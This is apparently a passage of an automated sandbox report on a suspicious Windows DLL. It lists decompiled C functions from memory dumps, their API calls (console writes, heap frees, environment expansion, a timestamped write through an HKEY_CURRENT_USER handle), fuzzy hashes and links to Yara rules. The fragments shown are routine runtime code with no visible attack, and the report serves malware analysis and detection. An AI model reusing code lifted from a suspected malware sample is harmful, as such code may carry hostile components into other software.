                                                                                                                                                                                                                                0x00a86ae3
                                                                                                                                                                                                                                0x00a86ae8
                                                                                                                                                                                                                                0x00a86aed
                                                                                                                                                                                                                                0x00a86af7
                                                                                                                                                                                                                                0x00a86b01
                                                                                                                                                                                                                                0x00a86b01
                                                                                                                                                                                                                                0x00a86af9
                                                                                                                                                                                                                                0x00a86af9
                                                                                                                                                                                                                                0x00a86af9
                                                                                                                                                                                                                                0x00a86af9
                                                                                                                                                                                                                                0x00a86b07
                                                                                                                                                                                                                                0x00a86b0d
                                                                                                                                                                                                                                0x00a86b0e
                                                                                                                                                                                                                                0x00a86b11
                                                                                                                                                                                                                                0x00a86b14
                                                                                                                                                                                                                                0x00a86b17
                                                                                                                                                                                                                                0x00a86b1f
                                                                                                                                                                                                                                0x00a86b28
                                                                                                                                                                                                                                0x00a86b30
                                                                                                                                                                                                                                0x00a86b30
                                                                                                                                                                                                                                0x00a86b32
                                                                                                                                                                                                                                0x00a86b34
                                                                                                                                                                                                                                0x00a86b34
                                                                                                                                                                                                                                0x00a86b3e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(00000000), ref: 00A81143
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(0070006F), ref: 00A81157
                                                                                                                                                                                                                                  • Part of subcall function 00A810E9: SysAllocString.OLEAUT32(00000000), ref: 00A81169
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A86ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A86B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: 8c0051f3a284f82277a87305d00225f729a5696a818c589deca5ceadd399b3b1
                                                                                                                                                                                                                                • Instruction ID: aebb9cc4796d1541ada40473f938712ba5e6805be348f517a5f865ec097b3f24
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c0051f3a284f82277a87305d00225f729a5696a818c589deca5ceadd399b3b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07011771A00218EBDB11FFE5E889EDEBBBCAB08754F104026F904EB251E73099018BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DF176, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DF176(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E736DF15F();
					E736DF121();
					_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                                                                                                                                                                0x736df193
                                                                                                                                                                                                                                0x736df197
                                                                                                                                                                                                                                0x736df1a4
                                                                                                                                                                                                                                0x736df1a9
                                                                                                                                                                                                                                0x736df1c4
                                                                                                                                                                                                                                0x736df1c4
                                                                                                                                                                                                                                0x736df1ca

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001), ref: 736DF18D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001,?,736DE456,736DC31E), ref: 736DF199
                                                                                                                                                                                                                                  • Part of subcall function 736DF15F: CloseHandle.KERNEL32(FFFFFFFE,736DF1A9,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001), ref: 736DF16F
                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 736DF1A9
                                                                                                                                                                                                                                  • Part of subcall function 736DF121: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,736DF150,736DEBC2,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF134
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF1BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                • Opcode ID: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction ID: 95232f7cdbc041a43871ea34cd9a6b5427bee782e7d9b302e20c9f486b7e61d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F01C37151259BBCF123FD2CC08B8A3F76FB082B2F144450FA1D9A264DA328820EB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A81F47, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81F47() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xa8d2a4; // 0x218
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xa8d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xa8d2a4; // 0x218
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa8d270; // 0x16f0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                                                                                                                0x00a81f47
                                                                                                                                                                                                                                0x00a81f4e
                                                                                                                                                                                                                                0x00a81f98
                                                                                                                                                                                                                                0x00a81f9a
                                                                                                                                                                                                                                0x00a81f9a
                                                                                                                                                                                                                                0x00a81f52
                                                                                                                                                                                                                                0x00a81f58
                                                                                                                                                                                                                                0x00a81f5d
                                                                                                                                                                                                                                0x00a81f61
                                                                                                                                                                                                                                0x00a81f67
                                                                                                                                                                                                                                0x00a81f6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a81f70
                                                                                                                                                                                                                                0x00a81f75
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a81f75
                                                                                                                                                                                                                                0x00a81f77
                                                                                                                                                                                                                                0x00a81f7f
                                                                                                                                                                                                                                0x00a81f82
                                                                                                                                                                                                                                0x00a81f82
                                                                                                                                                                                                                                0x00a81f88
                                                                                                                                                                                                                                0x00a81f8f
                                                                                                                                                                                                                                0x00a81f92
                                                                                                                                                                                                                                0x00a81f92
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000218,00000001,00A859AE), ref: 00A81F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A81F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000218), ref: 00A81F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(016F0000), ref: 00A81F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 475598ea1765660cada142810de68819597de4287f806adff5df7385f4f20608
                                                                                                                                                                                                                                • Instruction ID: 5c8c51323982b945662a44a0026deb5d2982e0675cfb03259b89b1182934b460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 475598ea1765660cada142810de68819597de4287f806adff5df7385f4f20608
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F01C71B01312DBDB20FBB49D08A9237ACAB157B17040615B919DB1D0EB30CC03CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D95E1, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D95E1() {

				E736DA293( *0x736efb08);
				 *0x736efb08 = 0;
				E736DA293( *0x736efb0c);
				 *0x736efb0c = 0;
				E736DA293( *0x736ef7ec);
				 *0x736ef7ec = 0;
				E736DA293( *0x736ef7f0);
				 *0x736ef7f0 = 0;
				return 1;
			}



                                                                                                                                                                                                                                0x736d95ea
                                                                                                                                                                                                                                0x736d95f7
                                                                                                                                                                                                                                0x736d95fd
                                                                                                                                                                                                                                0x736d9608
                                                                                                                                                                                                                                0x736d960e
                                                                                                                                                                                                                                0x736d9619
                                                                                                                                                                                                                                0x736d961f
                                                                                                                                                                                                                                0x736d9627
                                                                                                                                                                                                                                0x736d9630

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95EA
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95FD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D960E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D961F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction ID: b996a84b17f854129880ddc4232b88cba3e0281053167d4f0f7e0ea558b3dc78
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE01A778963209BDF027F13E60C6453B25F744B003B6401AE40C4A358D7BA4B2AEF88
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8EE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                			E736D8EE0(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E736DB1BE(_t48);
						E736DAC0B(_t48, _t57, 0, 0x736ef548, 0, 0x736ef548, 0x104);
						_t26 =  *0x736ef7f4; // 0x933390
						 *0x736ef7e4 = 0x736ef548;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x736ef548;
							_v20 = 0x736ef548;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E736D9191(E736D9018( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E736D9018( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E736DAAFE(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x736ef7e8 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x736ef7ec = _t58;
											L18:
											E736DA293(_t37);
											_v12 = 0;
											L19:
											E736DA293(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x736ef7e8 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x736ef7ec = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E736DA223(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E736DA223(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E736DA166();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

























                                                                                                                                                                                                                                0x736d8ee0
                                                                                                                                                                                                                                0x736d8ee9
                                                                                                                                                                                                                                0x736d8eee
                                                                                                                                                                                                                                0x736d8ef8
                                                                                                                                                                                                                                0x736d8efb
                                                                                                                                                                                                                                0x736d8f18
                                                                                                                                                                                                                                0x736d8f19
                                                                                                                                                                                                                                0x736d8f2c
                                                                                                                                                                                                                                0x736d8f31
                                                                                                                                                                                                                                0x736d8f39
                                                                                                                                                                                                                                0x736d8f3f
                                                                                                                                                                                                                                0x736d8f42
                                                                                                                                                                                                                                0x736d8f44
                                                                                                                                                                                                                                0x736d8f4b
                                                                                                                                                                                                                                0x736d8f4b
                                                                                                                                                                                                                                0x736d8f4d
                                                                                                                                                                                                                                0x736d8f50
                                                                                                                                                                                                                                0x736d8f53
                                                                                                                                                                                                                                0x736d8f5a
                                                                                                                                                                                                                                0x736d8f73
                                                                                                                                                                                                                                0x736d8f78
                                                                                                                                                                                                                                0x736d8f7a
                                                                                                                                                                                                                                0x736d8f9b
                                                                                                                                                                                                                                0x736d8fa3
                                                                                                                                                                                                                                0x736d8fa6
                                                                                                                                                                                                                                0x736d8fc1
                                                                                                                                                                                                                                0x736d8fc4
                                                                                                                                                                                                                                0x736d8fcb
                                                                                                                                                                                                                                0x736d8fcf
                                                                                                                                                                                                                                0x736d8fd1
                                                                                                                                                                                                                                0x736d8fd8
                                                                                                                                                                                                                                0x736d8fdb
                                                                                                                                                                                                                                0x736d8fdd
                                                                                                                                                                                                                                0x736d8fdf
                                                                                                                                                                                                                                0x736d8fe1
                                                                                                                                                                                                                                0x736d8feb
                                                                                                                                                                                                                                0x736d8feb
                                                                                                                                                                                                                                0x736d8fed
                                                                                                                                                                                                                                0x736d8ff3
                                                                                                                                                                                                                                0x736d8ff6
                                                                                                                                                                                                                                0x736d8ff8
                                                                                                                                                                                                                                0x736d8ffe
                                                                                                                                                                                                                                0x736d8fff
                                                                                                                                                                                                                                0x736d9005
                                                                                                                                                                                                                                0x736d9008
                                                                                                                                                                                                                                0x736d9009
                                                                                                                                                                                                                                0x736d900f
                                                                                                                                                                                                                                0x736d9012
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe6
                                                                                                                                                                                                                                0x736d8fe7
                                                                                                                                                                                                                                0x736d8fe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fd3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fd3
                                                                                                                                                                                                                                0x736d8fab
                                                                                                                                                                                                                                0x736d8fab
                                                                                                                                                                                                                                0x736d8fac
                                                                                                                                                                                                                                0x736d8fb1
                                                                                                                                                                                                                                0x736d8fb3
                                                                                                                                                                                                                                0x736d8fb5
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x736d8f7c
                                                                                                                                                                                                                                0x736d8f81
                                                                                                                                                                                                                                0x736d8f83
                                                                                                                                                                                                                                0x736d8f84
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f84
                                                                                                                                                                                                                                0x736d8f46
                                                                                                                                                                                                                                0x736d8f49
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f49
                                                                                                                                                                                                                                0x736d8efd
                                                                                                                                                                                                                                0x736d8f00
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f02
                                                                                                                                                                                                                                0x736d8f09
                                                                                                                                                                                                                                0x736d8f0a
                                                                                                                                                                                                                                0x736d8f0c
                                                                                                                                                                                                                                0x736d8f11
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f11
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                • API String ID: 0-1872383224
                                                                                                                                                                                                                                • Opcode ID: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction ID: e10f520f5ffcbd174ee4da33ff10d0a702636923c7cd1ec01184036597b65734
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1041A471A20314ABDF12DF9AD988B9EBBFDEB89710B14006AE405DB2C4D6718B44DB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A82AE3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A82AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E00A83037(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E00A89DA2(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E00A89BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0xa8d270, 0, _t25);
				}
				return _t22;
			}










                                                                                                                                                                                                                                0x00a82ae3
                                                                                                                                                                                                                                0x00a82af4
                                                                                                                                                                                                                                0x00a82af8
                                                                                                                                                                                                                                0x00a82b53
                                                                                                                                                                                                                                0x00a82afa
                                                                                                                                                                                                                                0x00a82b01
                                                                                                                                                                                                                                0x00a82b09
                                                                                                                                                                                                                                0x00a82b11
                                                                                                                                                                                                                                0x00a82b15
                                                                                                                                                                                                                                0x00a82b1b
                                                                                                                                                                                                                                0x00a82b23
                                                                                                                                                                                                                                0x00a82b26
                                                                                                                                                                                                                                0x00a82b3e
                                                                                                                                                                                                                                0x00a82b3e
                                                                                                                                                                                                                                0x00a82b49
                                                                                                                                                                                                                                0x00a82b49
                                                                                                                                                                                                                                0x00a82b5a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,01AE9364), ref: 00A82B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,01AE9364), ref: 00A82B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                • Opcode ID: adb93db7c0888b09421a31927a8fa33179795901f662305780a3cf1719a8c44a
                                                                                                                                                                                                                                • Instruction ID: 9882434fad3a2e82214b41cb0c85f3a66bc93f1cb68ab1a9ec6424bf60e7fe70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adb93db7c0888b09421a31927a8fa33179795901f662305780a3cf1719a8c44a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D018F32210249BBDF216FA5DD49FEB7BB9FF84754F100026FA409A161EA72D925CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A81EBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81EBA(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E00A85157(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E00A853BB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                                                                                                                                                0x00a81ec3
                                                                                                                                                                                                                                0x00a81ecd
                                                                                                                                                                                                                                0x00a81ed1
                                                                                                                                                                                                                                0x00a81ed9
                                                                                                                                                                                                                                0x00a81edd
                                                                                                                                                                                                                                0x00a81eec
                                                                                                                                                                                                                                0x00a81ef1
                                                                                                                                                                                                                                0x00a81ef1
                                                                                                                                                                                                                                0x00a81edd
                                                                                                                                                                                                                                0x00a81ef8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A87528,73797325), ref: 00A81ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A81EE5
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
